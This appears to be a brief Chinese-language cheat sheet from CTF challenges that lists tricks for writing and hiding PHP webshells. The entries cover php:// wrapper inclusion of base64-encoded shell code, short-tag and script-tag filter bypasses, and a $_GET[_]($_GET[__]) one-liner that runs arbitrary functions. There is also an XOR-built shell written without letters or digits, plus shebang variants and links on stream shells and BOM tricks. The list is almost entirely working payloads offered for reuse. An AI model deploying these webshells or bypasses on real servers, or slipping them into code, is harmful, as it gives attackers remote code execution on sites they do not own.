1. Meepwn2018 的 Mapl Story 题目
使用php伪协议包含base64编码的shell代码
2. php短标签
<?=
3. 不知道叫什么
<script language="php"></script>
4. 不知道叫什么2
$_GET[_]($_GET[__]);
5. 不用数字和字母,使用异或之类的位预算符(Meepwn OmegaSector)
$_='$<>/' ^ '{{{{';${$_}[_](${$_}[__]);
6. 流式shell
http://www.freebuf.com/articles/web/176571.html
7.
#!/usr/bin/php
#!/usr/bin/env php
#!/usr/bin/env -S -P/usr/local/bin:/usr/bin php
#!/usr/bin/env -S-P/usr/local/bin:/usr/bin:${PATH} php
8. BOM
https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html#3mime-type
网友评论